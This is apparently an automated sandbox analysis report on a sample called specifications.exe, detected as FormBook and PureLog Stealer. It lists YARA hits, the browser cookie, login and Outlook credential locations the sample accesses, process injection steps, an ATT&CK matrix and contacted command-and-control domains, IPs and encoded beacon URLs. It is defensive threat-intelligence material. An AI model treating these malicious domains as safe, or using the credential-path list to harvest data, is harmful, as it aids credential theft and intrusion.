                      Source: Yara matchFile source: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.specifications.exe.a050000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.specifications.exe.a050000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.specifications.exe.49d24e8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.specifications.exe.49d24e8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.specifications.exe.3235f60.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1734068950.00000000049B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1745019052.000000000A050000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1733539504.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                      Remote Access Functionality

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 2.2.specifications.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.specifications.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.4145588034.0000000000890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2048253746.00000000034F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4144538300.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.4145624190.00000000008E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2040380328.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2041857400.00000000013E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.4145519462.0000000003010000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.specifications.exe.a050000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.specifications.exe.a050000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.specifications.exe.49d24e8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.specifications.exe.49d24e8.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.specifications.exe.3235f60.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.1734068950.00000000049B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1745019052.000000000A050000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1733539504.00000000031B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                      DLL Side-Loading                      		412
                      Process Injection                      		1
                      Masquerading                      		1
                      OS Credential Dumping                      		121
                      Security Software Discovery                      		Remote Services1
                      Email Collection                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      Abuse Elevation Control Mechanism                      		1
                      Disable or Modify Tools                      		LSASS Memory2
                      Process Discovery                      		Remote Desktop Protocol11
                      Archive Collected Data                      		3
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading                      		41
                      Virtualization/Sandbox Evasion                      		Security Account Manager41
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin Shares1
                      Data from Local System                      		4
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                      Process Injection                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture4
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                      Deobfuscate/Decode Files or Information                      		LSA Secrets2
                      File and Directory Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Abuse Elevation Control Mechanism                      		Cached Domain Credentials113
                      System Information Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                      Obfuscated Files or Information                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                      Software Packing                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Timestomp                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      DLL Side-Loading                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565081 Sample: specifications.exe Startdate: 29/11/2024 Architecture: WINDOWS Score: 100 31 www.acc888ommodate.xyz 2->31 33 www.speedfactory.shop 2->33 35 17 other IPs or domains 2->35 45 Suricata IDS alerts for network traffic 2->45 47 Antivirus detection for URL or domain 2->47 49 Antivirus / Scanner detection for submitted sample 2->49 53 8 other signatures 2->53 10 specifications.exe 3 2->10         started        signatures3 51 Performs DNS queries to domains with low reputation 31->51 process4 file5 29 C:\Users\user\...\specifications.exe.log, ASCII 10->29 dropped 65 Injects a PE file into a foreign processes 10->65 14 specifications.exe 10->14         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 17 neghZqrDWkxUmu.exe 14->17 injected process9 signatures10 43 Found direct / indirect Syscall (likely to bypass EDR) 17->43 20 SearchProtocolHost.exe 13 17->20         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 20->55 57 Tries to harvest and steal browser information (history, passwords, etc) 20->57 59 Modifies the context of a thread in another process (thread injection) 20->59 61 3 other signatures 20->61 23 neghZqrDWkxUmu.exe 20->23 injected 27 firefox.exe 20->27         started        process13 dnsIp14 37 taxitayninh365.site 103.75.185.22, 50002, 50007, 50012 VNBOOKING-AS-VNVietNamBookingcorporationVN Viet Nam 23->37 39 carsten.studio 217.160.0.200, 50026, 50027, 50028 ONEANDONE-ASBrauerstrasse48DE Germany 23->39 41 10 other IPs or domains 23->41 63 Found direct / indirect Syscall (likely to bypass EDR) 23->63 signatures15

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      specifications.exe50%ReversingLabsByteCode-MSIL.Trojan.Swotter
                      specifications.exe100%AviraHEUR/AGEN.1305452
                      specifications.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.cortisalincontrol.net/__media__/design/underconstructionnotice.php?d=cortisalincontrol.ne0%Avira URL Cloudsafe
                      http://www.Cortisalincontrol.net0%Avira URL Cloudsafe
                      http://www.cortisalincontrol.net/cbfz/?JZOtU=wkx2NXiTkimKkWVHj8I851tghrwYfKl5WgEr82Da3v6V9hQpjwkjAwPIlceTp9yKNyaCzMrAs840f3u2xWNXS0bDb8L6xc5FYKVawF3pRnx98U9Wx8trKU0=&Tr=kdnPUNSPd00%Avira URL Cloudsafe
                      http://www.carsten.studio/fqxx/0%Avira URL Cloudsafe
                      http://www.cortisalincontrol.net/__media__/js/trademark.php?d=cortisalincontrol.net&type=ns0%Avira URL Cloudsafe
                      http://www.canadavinreport.site/4d2l/?JZOtU=ZGBp9LUVeZbORokkig5UphI/K0%Avira URL Cloudsafe
                      http://www.canadavinreport.site/4d2l/?JZOtU=ZGBp9LUVeZbORokkig5UphI/K+ukJjVB5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMMbIb+djSawZii0sFb5ZetUXWQKN4yoB6m0o=&Tr=kdnPUNSPd00%Avira URL Cloudsafe
                      http://conseilnsaftogo.org/lqxd/?Tr=kdnPUNSPd0&JZOtU=wYwrhtOuglxnIn2/Olpi5JeqaOWyslXDKK1NgpC20GbgYED0%Avira URL Cloudsafe
                      http://www.acc888ommodate.xyz/j1io/?Tr=kdnPUNSPd0&JZOtU=G6oz2WtW4adnoUNEj0mDd4tA5mRlmRwrrTmm8dHHgSuel3cEdmkBtbgCn6689YtHvLupKFRUL3t0MGFKqSatVnWojK2LYHm9HZs6Gkfl13sfdd70mrgRKgs=0%Avira URL Cloudsafe
                      http://www.conseilnsaftogo.org/lqxd/0%Avira URL Cloudsafe
                      http://www.5tuohbpzyj9.buzz/abgi/?JZOtU=LosdeFxQ6b3v/d4RM/O2IIZZxupncQ/ZGTDYvYgB3fNn+3JFEAQVpOMVTjnjMG/QWUj2NZ16mgwYZq+Px3flNvb4tlpcb0DKt+sPWXegcoTW+dqe2j7yGXM=&Tr=kdnPUNSPd0100%Avira URL Cloudmalware
                      http://www.ana-silverco.shop/eaqq/0%Avira URL Cloudsafe
                      http://www.ana-silverco.shop/eaqq/?Tr=kdnPUNSPd0&JZOtU=NxubQmq32TFwA/AheIz76Ea+WQ99/GP2yR9uwt+3Cm9QP0jQO/3+sgZCY8NDMJ5UVFnAF2VjMcKsp0wgFy5kYoTrL75hLvWNXnWLMBeEVcMza3YNaS2pisc=0%Avira URL Cloudsafe
                      http://www.taxitayninh365.site/ydza/?JZOtU=YQDMT/cjjLIrhYhQh0Q2mCJ/3eTpFU2r2WGK9Y1kX6vo8j7CWoL4SlIzIlGkR2TnTHSV+ODB3q8FGPL6osY1Ov0k4N9JYf0vMjBOMK/CTnPE/e/ddHfEQpw=&Tr=kdnPUNSPd00%Avira URL Cloudsafe
                      http://www.conseilnsaftogo.org/lqxd/?Tr=kdnPUNSPd0&JZOtU=wYwrhtOuglxnIn2/Olpi5JeqaOWyslXDKK1NgpC20GbgYEDR8w6xmbtuhBCgj8a/1RMYy9cnrRcVYl1JPFOG8jxHm9ssQM04UUNFlfB4f7o0+HklJ+ipcCU=0%Avira URL Cloudsafe
                      http://www.gadgetre.info/8q8w/0%Avira URL Cloudsafe
                      http://www.5tuohbpzyj9.buzz/abgi/100%Avira URL Cloudmalware
                      http://www.nb-shenshi.buzz/qrcg/?JZOtU=1fKHCnrcuLb+woCt8SH3V6St3YgMZevAmKr2RbCfVfhm3PNz+rp77RggAVXwPiu1rMLErXVWwt2AmyUPU1kZI8W3E5DqygOdKGokIjk/qmeUzpHsRWuRdGo=&Tr=kdnPUNSPd00%Avira URL Cloudsafe
                      http://www.conseilnsaftogo.org0%Avira URL Cloudsafe
                      http://www.gadgetre.info/8q8w/?JZOtU=oPmfzDvAiIeWP+diGQfRGlPJ8sXtmBaGpfszxH4jrRMMDKwng/5cFIiPa/6rGZsshFiqp6GKP0fVbj+TeZ8ormKyt2wgYmNmcIv/8C26BoWgGWFvXlTdI6M=&Tr=kdnPUNSPd00%Avira URL Cloudsafe
                      http://www.nb-shenshi.buzz/qrcg/0%Avira URL Cloudsafe
                      http://www.rtpmesinkoin.click/fsgl/?JZOtU=C9QsHkK47GSD7r6QEBJq03ghiAkwTDhYbFs9cpfO+uKQdjQ23Lhhb84Ia8cTOlIJgW821ZMigtRpVm/E2N9Fm2iWKgKq9aIKjjivs8jTrOy3xS+oUeAgIDw=&Tr=kdnPUNSPd00%Avira URL Cloudsafe
                      http://www.cortisalincontrol.net/cbfz/0%Avira URL Cloudsafe
                      http://www.taxitayninh365.site/ydza/0%Avira URL Cloudsafe
                      http://www.ascendercorp.com/typedesigners.htmlm0%Avira URL Cloudsafe
                      http://www.cortisalincontrol.net/display.cfm0%Avira URL Cloudsafe
                      http://www.laohub10.net/8s5b/?Tr=kdnPUNSPd0&JZOtU=CIoU3XkQQhyfpcUjsw2DsPW4kkmgmyFqHE31gFJTqo9NSkmYuUT5vLSdoQQ8/MieV/ko0R3BDKl76A9J0JdcYoVtQCZc0hRmp1UzBtNRjBvgSGCiGnWKebw=0%Avira URL Cloudsafe
                      http://www.rtpmesinkoin.click/fsgl/0%Avira URL Cloudsafe
                      http://www.carsten.studio/fqxx/?JZOtU=EQE6/f8JwKBVpYrOhw4vrtxv3XcBNO3b0nglp3s8GuOVuBTyHurIT2AdZcstinw02q63t984fSctf9ZXgFK38aa77s170gQvTYOFwikxrd70F79vmCfQ9/M=&Tr=kdnPUNSPd00%Avira URL Cloudsafe
                      http://www.acc888ommodate.xyz/j1io/0%Avira URL Cloudsafe
                      http://www.canadavinreport.site/4d2l/0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      rtpmesinkoin.click
                      		155.94.253.4
                      		truetrue
                        		unknown
                        carsten.studio
                        		217.160.0.200
                        		truetrue
                          		unknown
                          r0lqcud7.nbnnn.xyz
                          		23.225.159.42
                          		truetrue
                            		unknown
                            conseilnsaftogo.org
                            		154.70.82.246
                            		truetrue
                              		unknown
                              taxitayninh365.site
                              		103.75.185.22
                              		truetrue
                                		unknown
                                www.acc888ommodate.xyz
                                		176.32.38.130
                                		truetrue
                                  		unknown
                                  www.5tuohbpzyj9.buzz
                                  		156.232.181.155
                                  		truetrue
                                    		unknown
                                    www.canadavinreport.site
                                    		185.27.134.206
                                    		truefalse
                                      		high
                                      www.gadgetre.info
                                      		209.74.77.107
                                      		truetrue
                                        		unknown
                                        www.speedfactory.shop
                                        		172.67.216.173
                                        		truetrue
                                          		unknown
                                          www.ana-silverco.shop
                                          		104.21.90.137
                                          		truetrue
                                            		unknown
                                            www.cortisalincontrol.net
                                            		208.91.197.27
                                            		truetrue
                                              		unknown
                                              www.nb-shenshi.buzz
                                              		161.97.168.245
                                              		truefalse
                                                		high
                                                www.phoenix88.sbs
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.laohub10.net
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.conseilnsaftogo.org
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown
                                                      www.carsten.studio
                                                      		unknown
                                                      		unknownfalse
                                                        		unknown
                                                        www.taxitayninh365.site
                                                        		unknown
                                                        		unknownfalse
                                                          		unknown
                                                          www.rtpmesinkoin.click
                                                          		unknown
                                                          		unknownfalse
                                                            		unknown

                                                            Contacted URLs

                                                            NameMaliciousAntivirus DetectionReputation
                                                            http://www.canadavinreport.site/4d2l/?JZOtU=ZGBp9LUVeZbORokkig5UphI/K+ukJjVB5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMMbIb+djSawZii0sFb5ZetUXWQKN4yoB6m0o=&Tr=kdnPUNSPd0true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.carsten.studio/fqxx/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.cortisalincontrol.net/cbfz/?JZOtU=wkx2NXiTkimKkWVHj8I851tghrwYfKl5WgEr82Da3v6V9hQpjwkjAwPIlceTp9yKNyaCzMrAs840f3u2xWNXS0bDb8L6xc5FYKVawF3pRnx98U9Wx8trKU0=&Tr=kdnPUNSPd0true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.conseilnsaftogo.org/lqxd/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.acc888ommodate.xyz/j1io/?Tr=kdnPUNSPd0&JZOtU=G6oz2WtW4adnoUNEj0mDd4tA5mRlmRwrrTmm8dHHgSuel3cEdmkBtbgCn6689YtHvLupKFRUL3t0MGFKqSatVnWojK2LYHm9HZs6Gkfl13sfdd70mrgRKgs=true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.taxitayninh365.site/ydza/?JZOtU=YQDMT/cjjLIrhYhQh0Q2mCJ/3eTpFU2r2WGK9Y1kX6vo8j7CWoL4SlIzIlGkR2TnTHSV+ODB3q8FGPL6osY1Ov0k4N9JYf0vMjBOMK/CTnPE/e/ddHfEQpw=&Tr=kdnPUNSPd0true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.conseilnsaftogo.org/lqxd/?Tr=kdnPUNSPd0&JZOtU=wYwrhtOuglxnIn2/Olpi5JeqaOWyslXDKK1NgpC20GbgYEDR8w6xmbtuhBCgj8a/1RMYy9cnrRcVYl1JPFOG8jxHm9ssQM04UUNFlfB4f7o0+HklJ+ipcCU=true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.gadgetre.info/8q8w/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.5tuohbpzyj9.buzz/abgi/?JZOtU=LosdeFxQ6b3v/d4RM/O2IIZZxupncQ/ZGTDYvYgB3fNn+3JFEAQVpOMVTjnjMG/QWUj2NZ16mgwYZq+Px3flNvb4tlpcb0DKt+sPWXegcoTW+dqe2j7yGXM=&Tr=kdnPUNSPd0true
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://www.gadgetre.info/8q8w/?JZOtU=oPmfzDvAiIeWP+diGQfRGlPJ8sXtmBaGpfszxH4jrRMMDKwng/5cFIiPa/6rGZsshFiqp6GKP0fVbj+TeZ8ormKyt2wgYmNmcIv/8C26BoWgGWFvXlTdI6M=&Tr=kdnPUNSPd0true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.nb-shenshi.buzz/qrcg/?JZOtU=1fKHCnrcuLb+woCt8SH3V6St3YgMZevAmKr2RbCfVfhm3PNz+rp77RggAVXwPiu1rMLErXVWwt2AmyUPU1kZI8W3E5DqygOdKGokIjk/qmeUzpHsRWuRdGo=&Tr=kdnPUNSPd0true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.ana-silverco.shop/eaqq/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.ana-silverco.shop/eaqq/?Tr=kdnPUNSPd0&JZOtU=NxubQmq32TFwA/AheIz76Ea+WQ99/GP2yR9uwt+3Cm9QP0jQO/3+sgZCY8NDMJ5UVFnAF2VjMcKsp0wgFy5kYoTrL75hLvWNXnWLMBeEVcMza3YNaS2pisc=true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.5tuohbpzyj9.buzz/abgi/true
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            http://www.nb-shenshi.buzz/qrcg/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.rtpmesinkoin.click/fsgl/?JZOtU=C9QsHkK47GSD7r6QEBJq03ghiAkwTDhYbFs9cpfO+uKQdjQ23Lhhb84Ia8cTOlIJgW821ZMigtRpVm/E2N9Fm2iWKgKq9aIKjjivs8jTrOy3xS+oUeAgIDw=&Tr=kdnPUNSPd0true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.cortisalincontrol.net/cbfz/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.taxitayninh365.site/ydza/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.carsten.studio/fqxx/?JZOtU=EQE6/f8JwKBVpYrOhw4vrtxv3XcBNO3b0nglp3s8GuOVuBTyHurIT2AdZcstinw02q63t984fSctf9ZXgFK38aa77s170gQvTYOFwikxrd70F79vmCfQ9/M=&Tr=kdnPUNSPd0true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.acc888ommodate.xyz/j1io/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.rtpmesinkoin.click/fsgl/true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.laohub10.net/8s5b/?Tr=kdnPUNSPd0&JZOtU=CIoU3XkQQhyfpcUjsw2DsPW4kkmgmyFqHE31gFJTqo9NSkmYuUT5vLSdoQQ8/MieV/ko0R3BDKl76A9J0JdcYoVtQCZc0hRmp1UzBtNRjBvgSGCiGnWKebw=true
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.canadavinreport.site/4d2l/true
                                                            • Avira URL Cloud: safe
                                                            		unknown

                                                            URLs from Memory and Binaries

                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                            https://duckduckgo.com/chrome_newtabSearchProtocolHost.exe, 00000007.00000002.4147851493.0000000007678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://conseilnsaftogo.org/lqxd/?Tr=kdnPUNSPd0&JZOtU=wYwrhtOuglxnIn2/Olpi5JeqaOWyslXDKK1NgpC20GbgYEDSearchProtocolHost.exe, 00000007.00000002.4146192735.000000000495C000.00000004.10000000.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.000000000424C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designersGspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://dts.gnpge.comneghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://duckduckgo.com/ac/?q=SearchProtocolHost.exe, 00000007.00000002.4147851493.0000000007678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.fontbureau.com/designers/?specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.founder.com.cn/cn/bThespecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://i1.cdn-image.com/__media__/pics/29590/bg1.png)SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.fontbureau.com/designers?specifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://cdn.consentmanager.netSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2SearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.tiro.comspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SearchProtocolHost.exe, 00000007.00000002.4147851493.0000000007678000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.cortisalincontrol.net/__media__/design/underconstructionnotice.php?d=cortisalincontrol.neSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.fontbureau.com/designersspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.goodfont.co.krspecifications.exe, 00000000.00000002.1744453729.0000000009882000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.Cortisalincontrol.netSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://www.cortisalincontrol.net/__media__/js/trademark.php?d=cortisalincontrol.net&type=nsSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularSearchProtocolHost.exe, 00000007.00000002.4146192735.0000000004638000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000007.00000002.4147750121.0000000005C30000.00000004.00000800.00020000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003F28000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.canadavinreport.site/4d2l/?JZOtU=ZGBp9LUVeZbORokkig5UphI/KSearchProtocolHost.exe, 00000007.00000002.4146192735.00000000039A8000.00000004.10000000.00040000.00000000.sdmp, neghZqrDWkxUmu.exe, 00000008.00000002.4145670077.0000000003298000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
